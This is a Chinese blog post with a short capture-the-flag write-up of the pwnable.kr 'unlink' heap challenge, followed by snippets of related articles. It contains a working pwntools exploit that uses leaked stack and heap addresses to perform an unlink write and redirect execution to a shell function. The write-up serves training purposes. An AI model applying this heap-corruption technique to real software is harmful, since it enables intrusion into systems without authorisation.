pwnable.kr unlink

于 2022-03-12 21:56:23 发布
阅读量733 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014377094/article/details/123450948
版权

这里推荐一个软件WinScp,用来远程下载文件非常合适。

unlink内容,可以看到,是个模拟free状态下chunk的程序。

ida打开,可以看到main最后

可以利用unlink,更改ebp-4的内容为写有shellcode地址的地址+4来实现跳转到shellcode

+-------------+--------------+   <= A
|   fd        |    bk        |
|shell_addr   |  aaaa        |
+-------------+--------------+   <= B
|    aaaaaaaa(chunk size)    |
|heap_addr+8+4|stack_addr+16 |
|            buf             |
+-------------+--------------+

exp:

from pwn import *

context(arch='amd64',os='linux',log_level='info')
s = ssh(host='pwnable.kr',user='unlink',password='guest',port=2222)
shell_addr = 0x080484eb
ss = s.run('./unlink')
ss.recvuntil('here is stack address leak: ')
stack_addr = int(ss.recv(10),16)
ss.recvuntil('here is heap address leak: ')
heap_addr = int(ss.recv(10),16)
ss.sendline(p32(shell_addr)+'a'*12+p32(heap_addr+8+4)+p32(stack_addr+16))
ss.interactive()

Marx_ICB
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
node.js中的fs.unlink方法使用说明
10-25
在fs模块中,fs.unlink方法用于删除文件。 使用fs.unlink方法之前,首先需要引入fs模块。通过require方法引入fs模块,例如var fs = require('fs')。引入模块后,fs unlink方法可以被调用执行删除文件的操作。fs....
pwnable.kr】 unlink
weixin_30340745的博客
07-16 219
pwnable.kr 第一阶段的最后一题! 这道题目就是堆溢出的经典利用题目,不过是把堆块的分配与释放操作用C++重新写了一遍,可参考《C和C++安全编码一书》//不是广告 #include <stdio.h> #include <stdlib.h> #include <string.h> typedef struct tagOBJ{ ...
全面剖析Pwnable.kr unlink
Bill
08-10 2114
   最近一直在学习堆方面的知识,unlink是CTF中考察堆方面知识的重点.于是就拿一道简单的例题来剖析一下.堆方面的PWN对内存的分配和回收机制要求比较高,也是CTF中压轴题. 目录: 知识简介 漏洞分析 漏洞利用 Write Up及相关链接 知识简介: 为了节约内存,被使用之后的chunk和未使用的chunk的内存布局不相同,但是都用了相同的大小,于是free...
堆溢出 pawnable.kr Unlink
nibiru_holmes的博客
03-08 1761
题目地址:http://pwnable.kr/play.php 按题目提示连接  ssh unlink@pwnable.kr -p2222 (pw: guest) ls    发现和之前的题目一样: 三个文件分别是 flag,unlink,unlink.c 先查看unlink.c  源码如下: #include #include #include typedef struct tag
PWN unlink [pwnable.kr]CTF writeup题解系列14(包含本地解决方法)
重新启程
01-06 728
先看看题目内容: 这个题目是比较经典的unlink题目,网上已经有很多wp介绍了做法,我这里就不多阐述,只是把我对在不同操作系统版本下的理解和大家说一下。 我先把服务器的操作系统相关组件的版本和我自己本机用的docker的操作系统相关组件的版本信息列举一下: pwnable.kr # Linux prowl 4.4.179-0404179-generic #20190427043...
pwnable.kr-unlink
r00tnb的博客
07-26 430
前言 这是一道简化了的linux下malloc堆溢出漏洞利用。需要理解linux下关于glibc的堆管理的相关内容,参考 分析 分析源码unlink.c typedef struct tagOBJ{ struct tagOBJ* fd; struct tagOBJ* bk; char buf[8]; }OBJ; void shell(){ syst...
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
php中unlink()、mkdir()、rmdir()等方法的使用介绍
10-27
`unlink()`, `mkdir()`, 和 `rmdir()` 是三个关键的函数,用于处理文件和目录的操作。下面将详细介绍这三个函数的用法和注意事项。 1. **unlink() 函数**: `unlink()` 用于删除指定的文件。其基本语法是 `unlink...
给项目添加依赖:报错operation not permitted, unlink.原来是4048
01-20
syscall unlink npm ERR! path D:\Users\Megan\企业微信下载地址\WXWork\1688850487518406\Cache\File\2020-02\cmall-back1\node_modules\.staging\echarts-2100c70a\dist\echarts.js npm ERR! errno -4048 npm ERR...
pwnable.kr积累(一)
Don2100的博客
05-23 433
collision
unlink - pwnable
SkYe's Blog
09-30 484
预习知识 什么是unlinked unlinked 是堆溢出中的一种常见形式,通过将双向列表中的空闲块拿出来与将要free的物理相邻的块进行合并。(将双向链表上的chunk卸载下来与物理chunk合并) unlink漏洞条件 有3个以上的空闲chunk链表,其中最前面的chunk存在有堆溢出 unlink的触发 当使用free函数释放正在使用的chunk时,会相应地检查其相邻的chunk是否空闲...
pwnable.kr】unlink - unlink4字节写,劫持ecx到堆中获取main_retaddr
think_ycx的专栏
11-23 318
题目信息 直接看源码: 这题思路很清晰,程序模拟了最简单的unlink过程,unlink的本质就是把中间的chunk从前后解链,同时修改前面chunk的fd和后面chunk的bk。如果可以溢出了会被unlink的chunk,32bit下在FD-&gt;bk=BK时,拥有一次4bit写的机会,同时需要保证BK-&gt;fd可写(BK-&gt;fd=FD同理)。 拥有任意地址写的机会...
linux堆溢出学习之unsafe unlink
jmp esp
12-10 3387
示例代码来源:https://github.com/Escapingbug/how2heap/blob/master/unsafe_unlink.c#include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> uint64_t *chunk0_ptr;int main() { printf("We
pawnable.kr - 练习【持续更新中】
Peanuts
09-05 417
前言 刷一刷题。。才发现题目脑洞可以有多大 fd 这里可以看见这里有一个fd参数如果我们让fd等于0,那么之后调用read之后的第个参数为0就会读取我们键入的值了然后就可以输入下满要比较的值就可以了 collision 这里可以看见这里有一个强制类型的转换,char类型每一个占一位而int占4位所以我们输入的应该是5*4=20个字符并且每4个转换后相加的结果为hashcode =...
pwnable.kr第二遍---unlink asm memcpy
leeham的博客
03-16 420
pwnable.kr需要学会的内容:&gt;&gt;&gt;&gt;&gt;unlink如何查看堆栈的内存分布?查看源代码的汇编:gdb disassemble funcmov和lea的关系mov的第二个操作是只能是常量,不能是表达式lea ecx,eax 语法错误lea ecx,[eax] 将eax的值给ecx,[]中可以是表达式mov ecx,eax 将eax的值给ecx,第二个操作数不能使表...
rm: illegal option -- / usage: rm [-f | -i] [-dIPRrvWx] file ... unlink [--] file
最新发布
04-02
This error message is indicating that the user has used an illegal option while trying to execute the "rm" or "unlink" command. In this case, the user has used the "/" option which is not recognized ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值